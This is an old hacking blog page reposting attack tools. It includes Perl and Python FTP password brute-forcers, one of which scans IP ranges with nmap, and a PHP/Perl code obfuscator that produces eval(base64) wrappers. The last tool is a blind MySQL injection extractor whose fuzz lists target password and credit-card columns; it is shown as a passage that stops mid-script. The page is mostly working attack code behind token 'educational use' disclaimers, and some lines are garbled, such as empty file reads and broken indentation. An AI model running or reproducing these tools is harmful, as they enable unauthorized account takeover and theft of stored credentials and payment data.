Thursday, November 25, 2010

ftp brute forcer 

#!/usr/bin/perl

use strict;

use Getopt::Std;

use Net::FTP;

use vars qw($opt_h $opt_u $opt_U $opt_p $opt_P);

getopt("h:u:U:p:P:");

if ((!$opt_h) || ((!$opt_u) && (!$opt_U)) || ((!$opt_p) && (!$opt_P)) ){ &usage; exit; };

if (! -e "FTP_CRACK") {

open (LOGFILE, ">result.txt") or die "Cannot Open Log File";

close LOGFILE;

};

my $HOST = $opt_h;

my $USER;

my $PASS;

my @USERNAMES;

my @PASSWORDS;

my $ftp;

if ($opt_u) {$USERNAMES[0] = $opt_u;

         chomp $USERNAMES[0];

                    } else {

                    open (USERFILE, "$opt_U") or die "\a\nError Unable To Open $opt_U.\n $!";   

                    @USERNAMES = ;

                    close USERFILE;

                    };

if ($opt_p) {$PASSWORDS[0] = $opt_p;

             chomp $PASSWORDS[0];

                    } else {

                    open (PASSFILE, "$opt_P") or die "\a\nError Unable To Open $opt_P.\n $!";

                    @PASSWORDS = ;

                    close PASSFILE;

                    };

foreach my $U (@USERNAMES) {

                chomp $U;

                $USER = $U;

foreach my $P (@PASSWORDS) {

                chomp $P;

                $PASS = $P;

&connect;

&do_it;

};

};

&quit;

exit;

sub connect {

undef($ftp);

while (! $ftp) {

$ftp = Net::FTP -> new ("$HOST") or warn "\n\nSorry Cant Connect To $HOST\n$!";

        };

};

sub do_it{

$ftp -> login($USER,$PASS) and &success;

$ftp -> quit;

};

sub success {

open (LOGFILE, ">result.txt") or die "Cannot Open Log File";

print LOGFILE "\nUsername : $USER has Password : $PASS on $HOST.\n\n\n\n\n";

close LOGFILE;

&quit;

};

sub usage {

print "Usage:$0 -h HOST [-u USERNAME || -U USERLIST] [-p PASSWORD || -P PASSLIST]";

print "\n";

print "\n-h = Hostname Of FTP Server.";

print "\n-u = Single Username To crack.";

print "\n-U = List Of Usernames To crack.";

print "\n-p = Single Password To use.";

print "\n-P = List Of Passwords To use.";

print "\nCracked Accounts are appended To result.txt .";

print "\n\n";

exit;

};

sub quit {

print "\n\nI'M DONE ......\n\n";

exit;

};

------------------------------------------------
#!/usr/bin/perl

use strict;

use Getopt::Std;

use Net::FTP;

use vars qw($opt_h $opt_u $opt_U $opt_p $opt_P);

getopt("h:u:U:p:P:");

if ((!$opt_h) || ((!$opt_u) && (!$opt_U)) || ((!$opt_p) && (!$opt_P)) ){ &usage; exit; };

if (! -e "FTP_CRACK") {

open (LOGFILE, ">result.txt") or die "Cannot Open Log File";

close LOGFILE;

};

my $HOST = $opt_h;

my $USER;

my $PASS;

my @USERNAMES;

my @PASSWORDS;

my $ftp;

if ($opt_u) {$USERNAMES[0] = $opt_u;

         chomp $USERNAMES[0];

                    } else {

                    open (USERFILE, "$opt_U") or die "\a\nError Unable To Open $opt_U.\n $!";   

                    @USERNAMES = ;

                    close USERFILE;

                    };

if ($opt_p) {$PASSWORDS[0] = $opt_p;

             chomp $PASSWORDS[0];

                    } else {

                    open (PASSFILE, "$opt_P") or die "\a\nError Unable To Open $opt_P.\n $!";

                    @PASSWORDS = ;

                    close PASSFILE;

                    };

foreach my $P (@PASSWORDS) {

                chomp $P;

                $PASS = $P;

foreach my $U (@USERNAMES) {

                chomp $U;

                $USER = $U;

&connect;

&do_it;

};

};

&quit;

exit;

sub connect {

undef($ftp);

while (! $ftp) {

$ftp = Net::FTP -> new ("$HOST") or warn "\n\nSorry Cant Connect To $HOST\n$!";

        };

};

sub do_it{

$ftp -> login($USER,$PASS) and &success;

$ftp -> quit;

};

sub success {

open (LOGFILE, ">result.txt") or die "Cannot Open Log File";

print LOGFILE "\nUsername : $USER has Password : $PASS on $HOST.\n\n\n\n\n";

close LOGFILE;

&quit;

};

sub usage {

print "Usage:$0 -h HOST [-u USERNAME || -U USERLIST] [-p PASSWORD || -P PASSLIST]";

print "\n";

print "\n-h = Hostname Of FTP Server.";

print "\n-u = Single Username To crack.";

print "\n-U = List Of Usernames To crack.";

print "\n-p = Single Password To use.";

print "\n-P = List Of Passwords To use.";

print "\nCracked Accounts are appended To result.txt .";

print "\n\n";

exit;

};

sub quit {

exit;

};
Posted by at No comments:
Labels: , ,

ftp brute forcer in range of ip's

#!usr/bin/python
#Ftp Brute Forcer, searches ip_range for hosts using ftp.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import threading, time, StringIO, commands, random, sys, ftplib, re
from ftplib import FTP
from copy import copy

if len(sys.argv) !=4:
    print "Usage: ./ftpbrute.py <ip_range> <userlist> <wordlist>"
    sys.exit(1)

try:
      users = open(sys.argv[2], "r").readlines()
except(IOError):
      print "Error: Check your userlist path\n"
      sys.exit(1)
 
try:
      words = open(sys.argv[3], "r").readlines()
except(IOError):
      print "Error: Check your wordlist path\n"
      sys.exit(1)

print "\n\t   d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)

wordlist = copy(words)

def scan():

    iprange = sys.argv[1]
    ip_list = []
   
    nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 21 | grep open -B 3')[1]).readlines()
   
    for tmp in nmap:
        ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
        if ipaddr:
                ip_list.append(ipaddr[0])
    return ip_list

def reloader():
    for word in wordlist:
        words.append(word)

def getword():
    lock = threading.Lock()
    lock.acquire()
    if len(words) != 0:
        value = random.sample(words,  1)
        words.remove(value[0])
       
    else:
        reloader()
        value = random.sample(words,  1)
       
    lock.release()
    return value[0][:-1]
       
class Workhorse(threading.Thread):
   
    def run(self):
        value = getword()
        try:
            print "-"*12
            print "User:",user[:-1],"Password:",value
            ftp = FTP(ip)
            ftp.login(user[:-1], value)
            ftp.retrlines('LIST')
            print "\t\nLogin successful:",user, value
            ftp.quit()
            work.join()
            sys.exit(2)
        except (ftplib.all_errors), msg:
            #print "An error occurred:", msg
            pass

ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
    print "\n\tAttempting BruteForce:",ip,"\n"
    try:
        f = FTP(ip)
        print "[+] Response:",f.getwelcome()
    except (ftplib.all_errors):
        pass
    try:
        print "\n[+] Checking for anonymous login\n"
        ftp = FTP(ip)
        ftp.login()
        ftp.retrlines('LIST')
        print "\t\nAnonymous login successful!!!\n"
        ftp.quit()
    except (ftplib.all_errors):
        print "\tAnonymous login unsuccessful\n"
    for user in users:
        for i in range(len(words)):
            if i == 0: reloader()
            work = Workhorse()
            work.start()
            time.sleep(1)
Posted by at 1 comment:
Labels: , ,

ftp brute forcer

#!/usr/bin/python
################################################################
#       .___             __          _______       .___        #
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    #
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   #
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   #
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   #
#        \/                  \/             \/                 #
#                   ___________   ______  _  __                #
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                #
#                 \  \___|  | \/\  ___/\     /                 #
#                  \___  >__|    \___  >\/\_/                  #
#      est.2007        \/            \/   forum.darkc0de.com   #
################################################################
# This is ftp brute force tools .
# This was written for educational purpose and pentest only. Use it at your own risk.
# Suggestion ! don't use very large wordlist, because system need to read it first for a while and do it @ brute time... "that's cause LOSS" maybe you can use time.sleep(int)
# VISIT : http://www.devilzc0de.com
# CODING BY : gunslinger_
# EMAIL : gunslinger.devilzc0de@gmail.com
# TOOL NAME : ftpbrute.py v1.0
# Big thanks darkc0de member : d3hydr8, Kopele, icedzomby, VMw4r3 and all member
# Special thanks to devilzc0de crew : mywisdom, petimati, peneter, flyff666, rotlez, 7460, xtr0nic, devil_nongkrong, cruzen and all devilzc0de family
# Greetz : all member of jasakom.com, jatimcrew.com
# Special i made for jasakom member and devilzc0de family
# Please remember... your action will be logged in target system...
# Author will not be responsible for any damage !!
# Use it with your own risk

import sys
import time
import os
from ftplib import FTP

if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
    SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    SysCls = 'cls'
else:
    SysCls = 'unknown'

log = "ftpbrute.log"

file = open(log, "a")
def MyFace() :
    os.system(SysCls)
    print "\n            .___             .__ .__                  _______       .___                                                       "
    print "          __| _/ ____ ___  __|__||  |  ________  ____ \   _  \    __| _/ ____     ____ _______   ____ __  _  __                "
    print "         / __ |_/ __ \\\  \/ /|  ||  |  \___   /_/ ___\/  /_\  \  / __ |_/ __ \  _/ ___\\\_  __ \_/ __ \\\ \/ \/ /            "
    print "        / /_/ |\  ___/ \   / |  ||  |__ /    / \  \___\  \_/   \/ /_/ |\  ___/  \  \___ |  | \/\  ___/ \     /                 "
    print "        \____ | \___  > \_/  |__||____//_____ \ \___  >\_____  /\____ | \___  >  \___  >|__|    \___  > \/\_/                  "
    print "             \/     \/                       \/     \/       \/      \/     \/       \/             \/                         "
    print "                                                http://www.devilzc0de.com            "
    print "                                                by : gunslinger_                "
    print " ftpbrute.py version 1.0                                                                             "
    print " Brute forcing ftp target                                                             "
    print " Programmmer : gunslinger_                                                                            "
    print " gunslinger[at]devilzc0de[dot]com                                                                     "
    print "_______________________________________________________________________________________________________________________________________\n"
    file.write("\n            .___             .__ .__                  _______       .___                                                       ")
    file.write("\n          __| _/ ____ ___  __|__||  |  ________  ____ \   _  \    __| _/ ____     ____ _______   ____ __  _  __                ")
    file.write("\n         / __ |_/ __ \\\  \/ /|  ||  |  \___   /_/ ___\/  /_\  \  / __ |_/ __ \  _/ ___\\\_  __ \_/ __ \\\ \/ \/ /            ")
    file.write("\n        / /_/ |\  ___/ \   / |  ||  |__ /    / \  \___\  \_/   \/ /_/ |\  ___/  \  \___ |  | \/\  ___/ \     /                 ")
    file.write("\n        \____ | \___  > \_/  |__||____//_____ \ \___  >\_____  /\____ | \___  >  \___  >|__|    \___  > \/\_/                  ")
    file.write("\n             \/     \/                       \/     \/       \/      \/     \/       \/             \/                         ")
    file.write("\n                                                http://www.devilzc0de.com            ")
    file.write("\n                                                by : gunslinger_                ")
    file.write("\n ftpbrute.py version 1.0                                                                             ")
    file.write("\n Brute forcing ftp target                                                             ")
    file.write("\n Programmmer : gunslinger_                                                                            ")
    file.write("\n gunslinger[at]devilzc0de[dot]com                                                                     ")
    file.write("\n_______________________________________________________________________________________________________________________________________\n")


def HelpMe() :
    MyFace()
    print 'Usage: ./ftpbrute.py [options]\n'
        print 'Options: -t, --target    <hostname/ip>   |   Target to bruteforcing '
        print '         -u, --user      <user>          |   User for bruteforcing'
        print '         -w, --wordlist  <filename>      |   Wordlist used for bruteforcing'
        print '         -h, --help      <help>          |   print this help'
        print '                                                            \n'
        print 'Example: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt        \n'
    file.write( '\nUsage: ./ftpbrute.py [options]')
        file.write( '\nOptions: -t, --target    <hostname/ip>   |   Target to bruteforcing ')
        file.write( '\n         -u, --user      <user>          |   User for bruteforcing')
        file.write( '\n         -w, --wordlist  <filename>      |   Wordlist used for bruteforcing')
        file.write( '\n         -h, --help      <help>          |   print this help')
        file.write( '\n     maybe you can use time.sleep(int)                                                        \n')
        file.write( '\nExample: ./ftpbrute.py -t 192.168.1.1 -u root -w wordlist.txt        \n')
    sys.exit(1)

for arg in sys.argv:
    if arg.lower() == '-t' or arg.lower() == '--target':
            hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-u' or arg.lower() == '--user':
            user = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-w' or arg.lower() == '--wordlist':
            wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
    elif arg.lower() == '-h' or arg.lower() == '--help':
            HelpMe()
    elif len(sys.argv) <= 1:
        HelpMe()
       

def BruteForce(word) :
    print "[?]Trying :",word
    file.write("\n[?]Trying :"+word)
         try:
        ftp = FTP(hostname)
        ftp.login(user, word)
        ftp.retrlines('list')
        ftp.quit()
        print "\n\t[!] Login Success ! "
        print "\t[!] Username : ",user, ""
        print "\t[!] Password : ",word, ""
        print "\t[!] Hostname : ",hostname, ""
        print "\t[!] Log all has been saved to",log,"\n"
        file.write("\n\n\t[!] Login Success ! ")
        file.write("\n\t[!] Username : "+user )
        file.write("\n\t[!] Password : "+word )
        file.write("\n\t[!] Hostname : "+hostname)
        file.write("\n\t[!] Log all has been saved to "+log)
        sys.exit(1)
       except Exception, e:
            #print "[-] Failed"
        pass
    except KeyboardInterrupt:
        print "\n[-] Aborting...\n"
        file.write("\n[-] Aborting...\n")
        sys.exit(1)

def Action ():
    MyFace()
    print "[!] Starting attack at %s" % time.strftime("%X")
    print "[!] System Activated for brute forcing..."
    print "[!] Please wait until brute forcing finish !\n"
    file.write("\n[!] Starting attack at %s" % time.strftime("%X"))
    file.write("\n[!] System Activated for brute forcing...")
    file.write("\n[!] Please wait until brute forcing finish !\n")

Action()
   

try:
    words = open(wordlist, "r").readlines()
except(IOError):
      print "\n[-] Error: Check your wordlist path\n"
    file.write("\n[-] Error: Check your wordlist path\n")
      sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] Server:",hostname
print "[+] User:",user
print "[+] BruteForcing...\n"
for word in words:
    BruteForce(word.replace("\n",""))

file.close()
Posted by at No comments:
Labels: , ,

php code obfuscator

<?
// PHP OBFUSCATOR
// (C)2003 Richard Fairthorne -- http://richard.fairthorne.is-a-geek.com
// --------------------------
// Permission is granted to disctibute this file UNMODIFIED from its original
// form. All other rights are reserved.

function splitByNewline($string, $length) {
    while (strlen($string)>0) {
    $newstring.=substr($string, 0, $length) . "\n";
    $string=substr($string, $length);
    }
  return $newstring;
}

echo "<big><b>Free Code Obfuscator (PHP, PERL)</b></big><br>By <a href='http://richard.fairthorne.is-a-geek.com'>Richard Fairthorne</a><hr>";

$b64_input=stripslashes($b64_input);
switch($b64_action) {
    case "perl_encode":
      $output=$b64_input;
         $output=base64_encode($output);
    $output=splitByNewline($output,40);
    $output="#!/usr/bin/perl\nuse MIME::Base64;\neval(decode_base64('\n$output'));";
   
    $ilength=strlen($b64_input);
    $olength=strlen($output);

    ?>
    <table border=0 width=100%><tr><td valign=top>
    <textarea rows=18 cols=60 name=done><?=$output;?></textarea>
    </td><td valign=top>
    <b>PERL code obfuscated!</b><br><br>
   
    Your PERL code has been obfuscated.
    <br><br>
    <font color=maroon>
    Obfuscation-Strength: Normal (Fast code execution)<br>
    Compatibility: 100% Code compatibility<br>
    Input Length: <?=$ilength;?><br>
    Output Length: <b><?=$olength;?></b><br>
    </font>
    <br>
    To use the code, simply cut and paste it in place of the old code. You may need to update the perl path.
    It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
    for encryption.<br><br>
   
    <a href='?'>Click here</a> to obfuscate another page.
    </td></tr></table>
    <?
  break;
    case "php_encode":
      $output=$b64_input;
         $output=gzdeflate("?>".$output."<?",9);
         $output=base64_encode($output);
    $output=splitByNewline($output,40);
    $output="<? eval(gzinflate(base64_decode('\n$output'))); ?>";
   
    $ilength=strlen($b64_input);
    $olength=strlen($output);

    ?>
    <table border=0 width=100%><tr><td valign=top>
    <textarea rows=18 cols=60 name=done><?=$output;?></textarea>
    </td><td valign=top>
    <b>PHP code obfuscated!</b><br><br>
   
    Your PHP code has been obfuscated.
    <br><br>
    <font color=maroon>
    Obfuscation-Strength: Normal (Fast code execution)<br>
    Compatibility: Zlib Required. 100% Code compatibility<br>
    Input Length: <?=$ilength;?><br>
    Output Length: <b><?=$olength;?></b><br>
    </font>
    <br>
    To use the code, simply cut and paste it in place of the old code.
    It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
    for encryption.<br><br>
   
    <a href='?'>Click here</a> to obfuscate another page.
    </td></tr></table>
    <?
  break;
    case "php_encode_hi":
      $output=$b64_input;
    for ($b64_counter=0; $b64_counter<10; $b64_counter++) {
          $output=gzdeflate("?>".$output."<?",9);
          $output=base64_encode($output);
      $output="<? eval(gzinflate(base64_decode('$output'))); ?>";
    }
        $output=gzdeflate("?>".$output."<?",9);
        $output=base64_encode($output);
    $output="<? eval(gzinflate(base64_decode('\n$output'))); ?>";
   
    $ilength=strlen($b64_input);
    $olength=strlen($output);
   
    ?>

    <table border=0 width=100%><tr><td valign=top>
    <textarea rows=18 cols=60 name=done><?=$output;?></textarea>
    </td><td valign=top>
    <b>PHP code obfuscated!</b><br><br>
   
    Your PHP code has been obfuscated.
    <br><br>
    <font color=maroon>
    Obfuscation-Strength: Trecherous (Best Protection)<br>
    Compatibility: Zlib Required. 100% Code Compatibility.<br>
    Input Length: <?=$ilength;?><br>
    Output Length: <b><?=$olength;?></b><br>
    </font>
    <br>
    To use the code, simply cut and paste it in place of the old code.
    It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
    for encryption.<br><br>
   
    <a href='?'>Click here</a> to obfuscate another page.
    </td></tr></table>
    <?
  break;
  // case "decode":
  //     $output=htmlentities(base64_decode($b64_input),ENT_QUOTES);
  // break;
  default:
    ?>
    <table border=0 width=100%><tr><td valign=top>
    <form method=post>
    <textarea  name=b64_input cols=60 rows=16></textarea><br>
    <SELECT name=b64_action>
    <OPTION value='php_encode'>PHP - Normal Strength - Compressed</OPTION>
    <OPTION value='php_encode_hi'>PHP - Trecherous Strength - Compressed</OPTION>
    <OPTION value='perl_encode'>PERL - Normal Strength</OPTION>
    </SELECT>
    <input type=submit name=submit value='obfuscate'>
    <!-- <input type=submit name=b64_action value=decode> -->
    </form>
    </td><td valign=top>
    <b>Free Code obfuscator</b><br><br>
   
    If you would like a quick way to hide your php code from prying eyes, try this PHP code obfuscator.<br><br>Copy an entire PHP page, into the obfuscator, and it will return a code that also works on any PHP server, but is not human readable.<br><br>

        With code 5k or bigger, you may notice that the obfuscated code is smaller than the original code. You can thank me later.
    </td></tr></table>
    <? 
  break;
}
?>
Posted by at No comments:
Labels: ,

mysql 4.x 5.x blind injector

#!/usr/bin/python
# Features!
# 1.MySQL Blind Injection Data Extractor
# 2.MySQL Blind Information_schema Database Enumerator
# 3.MySQL Blind Table and Column Fuzzer

# Feel free to do whatever you want with this code!
# Share the c0de!

# Darkc0de Team
# www.darkc0de.com
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx
# and the rest of the Darkc0de members

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# BE WARNED, THIS TOOL IS VERY LOUD..

# Change Log
# 2.9 - added info mode, bug fix in the GuessValue function
# 3.0 - added row option.. now you can tell the app where to begin - remember limit start at 0 not 1

#Fill in the tables you want tested here.
fuzz_tables = ["user","users","username","usernames","mysql.user","orders","order_items","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","account","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"]
#Fill in the columns you want tested here.
fuzz_columns = ["user","username","password","passwd","pass","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber","order_payment","card_number","is_admin","cc_number","ccnum","cc_num","credit_card_number","cvc_code","billing_first_name","cvv","cvv2","firstname","lastname","fname","lname","first","last"]
 

import urllib, sys, re, os, socket, httplib, urllib2, time

#the guts and glory - Binary Algorithim that does all the guessing
def GuessValue(URL):
        global gets
        global proxy_num
        lower = lower_bound
        upper = upper_bound
        while lower < upper:
                try:
                        mid = (lower + upper) / 2
                        head_URL = URL + ">"+str(mid)
                        #print head_URL
                        gets+=1
                        proxy_num+=1
                        source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
                        match = re.findall(string,source)
                        if len(match) >= 1:
                                lower = mid + 1
                        else:
                                upper = mid                   
                except (KeyboardInterrupt, SystemExit):
                        raise
                except:
                        pass

        if lower > lower_bound and lower < upper_bound:
                value = lower
        else:
                head_URL = URL + "="+str(lower)
                gets+=1
                proxy_num+=1
                source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
                match = re.findall(string,source)
                if len(match) >= 1:
                        value = lower
                else:
                        value = 63
                        print "Could not find the ascii character! There must be a problem.."
                        print "Check to make sure your using the app right!"
                        print "READ xprog's blind sql tutorial!\n"
                        sys.exit(1)
        return value

#determine platform
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
    SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
    SysCls = 'cls'
else:
    SysCls = 'unknown'

#say hello
os.system(SysCls)
if len(sys.argv) <= 1:
        print "\n|---------------------------------------------------------------|"
        print "| rsauron[@]gmail[dot]com                                 v3.0  |"
        print "|   7/2008      blindext.py                                     |"
        print "|      -Blind MySQL v5+ Information_schema Database Enumeration |"
        print "|      -Blind MySQL v4+ Data Extractor                          |"
        print "|      -Blind MySQL v4+ Table & Column Fuzzer                   |"
        print "| Usage: blindext.py [options]                                  |"
        print "|                    -h help                    darkc0de.com    |"
        print "|---------------------------------------------------------------|\n"
        sys.exit(1)

#define varablies
site = ""
string = ""
dbt = "blindextlog.txt"
proxy = "None"
count = 0
mode = "None"
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_dump = "None"
arg_schema = "None"
arg_dbs = "None"
arg_mysqldb = ""
darkc0de = ""
line_URL = ""
lower_bound = 0
upper_bound = 10000
gets = 0
mid =0
let_pos = 1
lim_num = 0
value = ""

#help option
for arg in sys.argv:
        if arg == "-h":
                print "\n   Usage: ./blindext.py [options]        rsauron[@]gmail[dot]com darkc0de.com"
                print "\tModes:"
                print "\tDefine: --schema Enumerate Information_schema Database."
                print "\tDefine: --dump   Extract information from a Database, Table and Column."
                print "\tDefine: --dbs    Shows all databases user has access too."
                print "\tDefine: --fuzz   Fuzz Tables and Columns."
                print "\tDefine: --info   Prints server version, username@location, database name."
                print "\n\tRequired:"
                print "\tDefine: -u       \"www.site.com/news.php?id=234\""
                print "\tDefine: -s       \"truetextinpage\""
                print "\n\tModes dump and schema options:"
                print "\tDefine: -D       \"database_name\""
                print "\tDefine: -T       \"table_name\""
                print "\tDefine: -C       \"column_name,column_name...\""
                print "\n\tOptional:"
                print "\tDefine: -r       row to begin extracting info at."
                print "\tDefine: -p       \"127.0.0.1:80 or proxy.txt\""
                print "\tDefine: -o       \"ouput_file_name.txt\"          Default:blindextlog.txt"
                print "\n   Ex: ./blindext.py --dbs -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -o output.txt"
                print "   Ex: ./blindext.py --fuzz -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -p 127.0.0.1:8080"
                print "   Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog"
                print "   Ex: ./blindext.py --schema -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D catalog -T orders -p proxy.txt"
                print "   Ex: ./blindext.py --dump -u \"www.site.com/news.php?id=234\" -s \"textinpage\" -D newjoom -T jos_users -C username,password"
                sys.exit(1)

#Check args
for arg in sys.argv:
    if arg == "-u":
        site = sys.argv[count+1]
    elif arg == "-s":
                string = sys.argv[count+1]
    elif arg == "-o":
        dbt = sys.argv[count+1]
    elif arg == "-p":
        proxy = sys.argv[count+1]
    elif arg == "--dump":
                mode = arg
                arg_dump = sys.argv[count]
        elif arg == "--schema":
                mode = arg
                arg_schema = sys.argv[count]
        elif arg == "--dbs":
                mode = arg
                arg_dbs = sys.argv[count]
        elif arg == "--fuzz":
                mode = arg
                arg_fuzz = sys.argv[count]
        elif arg == "--info":
                mode = arg
                arg_info = sys.argv[count]
    elif arg == "-D":
        arg_database = sys.argv[count+1]
    elif arg == "-T":
        arg_table = sys.argv[count+1]
    elif arg == "-C":
        arg_columns = sys.argv[count+1]
    elif arg == "-r":
                lim_num = sys.argv[count+1]
    count+=1

#Title write
file = open(dbt, "a")
print "\n|---------------------------------------------------------------|"
print "| rsauron[@]gmail[dot]com                                 v3.0  |"
print "|   7/2008      blindext.py                                     |"
print "|      -Blind MySQL v5+ Information_schema Database Enumeration |"
print "|      -Blind MySQL v4+ Data Extractor                          |"
print "|      -Blind MySQL v4+ Table & Column Fuzzer                   |"
print "| Usage: blindext.py [options]                                  |"
print "|                    -h help                    darkc0de.com    |"
print "|---------------------------------------------------------------|"
file.write("\n\n|---------------------------------------------------------------|")
file.write("\n| rsauron[@]gmail[dot]com                                 v3.0  |")
file.write("\n|   7/2008      blindext.py                                     |")
file.write("\n|      -Blind MySQL v5+ Information_schema Database Enumeration |")
file.write("\n|      -Blind MySQL v4+ Data Extractor                          |")
file.write("\n|      -Blind MySQL v4+ Table & Column Fuzzer                   |")
file.write("\n| Usage: blindext.py [options]                                  |")
file.write("\n|                    -h help                    darkc0de.com    |")
file.write("\n|---------------------------------------------------------------|")
   
#Arg Error Checking
if site == "":
        print "\n[-] Must include -u flag and -s flag."
        print "[-] For help -h\n"
        sys.exit(1)
if string == "":
        print "\n[-] Must include -s flag followed by \"truetextinpage\" string."
        print "[-] For help -h\n"
        sys.exit(1)
if mode == "None":
        print "\n[-] Mode must be specified --schema --dbs --dump --fuzz"
        print "[-] For help -h\n"
        sys.exit(1)
if mode == "--schema" and arg_database == "None":
        print "[-] Must include -D flag!"
        print "[-] For Help -h\n"
        sys.exit(1)
if mode == "--dump":
        if arg_table == "None" or arg_columns == "None":
                print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!"
                print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!"
                print "[-] For help -h\n"
                sys.exit(1)
if proxy != "None":
        if len(proxy.split(".")) == 2:
                proxy = open(proxy, "r").read()
        if proxy.endswith("\n"):
                proxy = proxy.rstrip("\n")
        proxy = proxy.split("\n")
if arg_columns != "None":
        arg_columns = arg_columns.split(",")
if site[:7] != "http://":
    site = "http://"+site

#Build proxy list
print "\n[+] URL:",site
file.write("\n\n[+] URL:"+site+"\n")
socket.setdefaulttimeout(10)
proxy_list = []
if proxy != "None":
       
        file.write("[+] Building Proxy List...")
        print "[+] Building Proxy List..."
        for p in proxy:
                try:
                    proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
                    opener = urllib2.build_opener(proxy_handler)
                    opener.open("http://www.google.com")
                    proxy_list.append(urllib2.build_opener(proxy_handler))
                    file.write("\n\tProxy:"+p+"- Success")
                    print "\tProxy:",p,"- Success"
                except:
                    file.write("\n\tProxy:"+p+"- Failed")
                    print "\tProxy:",p,"- Failed"
                    pass
        if len(proxy_list) == 0:
                print "[-] All proxies have failed. App Exiting"
                file.write("\n[-] All proxies have failed. App Exiting\n")
                sys.exit(1)
        print "[+] Proxy List Complete"
        file.write("[+] Proxy List Complete")
else:
    print "[-] Proxy Not Given"
    file.write("[+] Proxy Not Given")
    proxy_list.append(urllib2.build_opener())

#Gather Server Config
print "[+] Gathering MySQL Server Configuration..."
file.write("\n[+] Gathering MySQL Server Configuration...")
proxy_num = 0
proxy_len = len(proxy_list)
ser_ver = 3
while 1:
        try:
                config_URL = site+"+and+substring(@@version,1,1)="+str(ser_ver)
                proxy_num+=1
                source = proxy_list[proxy_num % proxy_len].open(config_URL).read()
                match = re.findall(string,source)
                if len(match) >= 1:
                        print "\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!"
                        file.write("\n\t[+] MySQL >= v"+str(ser_ver)+".0.0 found!")
                        if int(ser_ver) <= 4 and mode == "--schema":
                                print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
                                file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
                                print "[-] Done"
                                file.write("[-] Done")
                                sys.exit(1)
                        if int(ser_ver) <= 4 and mode == "--dbs":
                                print "\t[-] Schema & dbs mode only works on MySQL v5+!!"
                                file.write("\n\t[-] Schema & dbs mode only work on MySQL v5+!!")
                                print "[-] Done"
                                file.write("[-] Done")
                                sys.exit(1)
                        break
                if int(ser_ver) >= 6:
                        print "\t[-] Not a MySQL server or the string your using is not being found!"
                        file.write("\n\t[-] Not a MySQL server or the string your using is not being found!")
                        print "[-] Done"
                        file.write("[-] Done")
